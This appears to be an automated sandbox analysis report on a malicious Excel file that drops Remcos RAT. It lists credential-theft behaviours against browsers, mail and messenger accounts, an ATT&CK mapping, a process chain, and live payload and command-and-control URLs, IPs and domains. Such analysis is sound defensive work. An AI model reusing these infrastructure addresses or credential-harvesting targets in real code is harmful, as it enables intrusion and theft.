                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,29_2_0041881C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,30_2_004082CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,32_2_0044800F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0041739B GetVersionExW,29_2_0041739B
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data32_2_0040B21B
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db32_2_0040B335
                  Searches for Windows Mail specific files
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword30_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword30_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword30_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2392, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-Z4DJFI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-Z4DJFI
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe32_2_00405042

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts11
                  Native API                  		121
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts23
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		21
                  Obfuscated Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts123
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Install Root Certificate                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares21
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model111
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell                  		Network Logon Script321
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets39
                  System Information Discovery                  		SSH4
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials3
                  Security Software Discovery                  		VNCGUI Input Capture213
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt321
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1567364 Sample: 0200011080.xls Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 99 Suricata IDS alerts for network traffic 2->99 101 Found malware configuration 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 20 other signatures 2->105 12 EXCEL.EXE 59 32 2->12         started        process3 dnsIp4 89 142.93.65.161, 49166, 49168, 49169 DIGITALOCEAN-ASNUS United States 12->89 91 short.ruksk.com 54.150.207.131, 443, 49165, 49167 AMAZON-02US United States 12->91 75 C:\Users\user\Desktop\0200011080.xls (copy), Composite 12->75 dropped 77 niceworkingpersonw...eisbeautiful[1].hta, HTML 12->77 dropped 149 Microsoft Office drops suspicious files 12->149 17 mshta.exe 10 12->17         started        21 mshta.exe 10 12->21         started        file5 signatures6 process7 dnsIp8 79 short.ruksk.com 17->79 107 Suspicious command line found 17->107 109 PowerShell case anomaly found 17->109 23 cmd.exe 17->23         started        81 short.ruksk.com 21->81 26 cmd.exe 21->26         started        signatures9 process10 signatures11 119 Suspicious powershell command line found 23->119 121 Wscript starts Powershell (via cmd or directly) 23->121 123 PowerShell case anomaly found 23->123 28 powershell.exe 24 23->28         started        32 powershell.exe 26->32         started        process12 file13 71 weneedkissingwello...riendshebeautif.vbS, Unicode 28->71 dropped 73 C:\Users\user\AppData\...\sietgs52.cmdline, Unicode 28->73 dropped 143 Installs new ROOT certificates 28->143 34 wscript.exe 1 28->34         started        37 csc.exe 2 28->37         started        40 wscript.exe 32->40         started        42 csc.exe 32->42         started        signatures14 process15 file16 111 Suspicious powershell command line found 34->111 113 Wscript starts Powershell (via cmd or directly) 34->113 115 Windows Scripting host queries suspicious COM object (likely to drop second stage) 34->115 117 Suspicious execution chain found 34->117 44 powershell.exe 12 4 34->44         started        67 C:\Users\user\AppData\Local\...\sietgs52.dll, PE32 37->67 dropped 48 cvtres.exe 37->48         started        50 powershell.exe 40->50         started        69 C:\Users\user\AppData\Local\...\tc3erle0.dll, PE32 42->69 dropped 52 cvtres.exe 42->52         started        signatures17 process18 dnsIp19 93 res.cloudinary.com 44->93 145 Writes to foreign memory regions 44->145 147 Injects a PE file into a foreign processes 44->147 54 CasPol.exe 44->54         started        95 cloudinary.map.fastly.net 151.101.65.137, 443, 49176 FASTLYUS United States 50->95 97 res.cloudinary.com 50->97 58 CasPol.exe 50->58         started        signatures20 process21 dnsIp22 83 apamanollonan.duckdns.org 54->83 85 apamanollonan.duckdns.org 31.13.224.72, 4044, 49178, 49179 SARNICA-ASBG Bulgaria 54->85 87 geoplugin.net 178.237.33.50, 49180, 80 ATOM86-ASATOM86NL Netherlands 54->87 125 Contains functionality to bypass UAC (CMSTPLUA) 54->125 127 Detected Remcos RAT 54->127 129 Tries to steal Mail credentials (via file registry) 54->129 133 6 other signatures 54->133 60 CasPol.exe 54->60         started        63 CasPol.exe 54->63         started        65 CasPol.exe 54->65         started        signatures23 131 Uses dynamic DNS services 83->131 process24 signatures25 135 Tries to steal Instant Messenger accounts or passwords 60->135 137 Tries to steal Mail credentials (via file / registry access) 60->137 139 Searches for Windows Mail specific files 60->139 141 Tries to harvest and steal browser information (history, passwords, etc) 63->141

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  0200011080.xls14%ReversingLabs
                  0200011080.xls100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://142.93.65.161/680/weneedk0%Avira URL Cloudsafe
                  http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...r0%Avira URL Cloudsafe
                  http://crl.pkioverheIi0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rTm0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemaker0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0%Avira URL Cloudsafe
                  http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFa%0I0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htay0%Avira URL Cloudsafe
                  http://142.93.65.161/680/SRVRER.txt0%Avira URL Cloudsafe
                  http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFp0%Avira URL Cloudsafe
                  https://short.ruksk.com/Dat0%Avira URL Cloudsafe
                  https://short.ruksk.com/us0%Avira URL Cloudsafe
                  http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFA0%Avira URL Cloudsafe
                  lonan.duckdns.org0%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_0%Avira URL Cloudsafe
                  http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF10%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerX0%Avira URL Cloudsafe
                  http://142.93.65.161/0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htapC:0%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerL0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&XKy0%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerO0%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerI0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htacC:0%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerA0%Avira URL Cloudsafe
                  http://142.93.65.161/60%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htak0%Avira URL Cloudsafe
                  https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker/0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaG0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htahttp://142.93.65.10%Avira URL Cloudsafe
                  https://short.ruksk.com/0%Avira URL Cloudsafe
                  http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFC:0%Avira URL Cloudsafe
                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0n0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  apamanollonan.duckdns.org
                  		31.13.224.72
                  		truetrue
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		high
                      cloudinary.map.fastly.net
                      		151.101.65.137
                      		truefalse
                        		high
                        short.ruksk.com
                        		54.150.207.131
                        		truefalse
                          		unknown
                          res.cloudinary.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://142.93.65.161/680/SRVRER.txttrue
                            • Avira URL Cloud: safe
                            		unknown
                            lonan.duckdns.orgtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                              		high
                              http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htatrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://geoplugin.net/json.gpfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.pkioverheIipowershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.imvu.comrCasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://142.93.65.161/680/weneedkpowershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv5265.tmp.29.drfalse
                                    		high
                                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv5265.tmp.29.drfalse
                                      		high
                                      https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgXpowershell.exe, 0000000C.00000002.523814321.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv5265.tmp.29.drfalse
                                              		high
                                              http://www.nirsoft.netCasPol.exe, 0000001D.00000002.547843346.0000000000224000.00000004.00000010.00020000.00000000.sdmpfalse
                                                		high
                                                https://deff.nelreports.net/api/report?cat=msnbhv5265.tmp.29.drfalse
                                                  		high
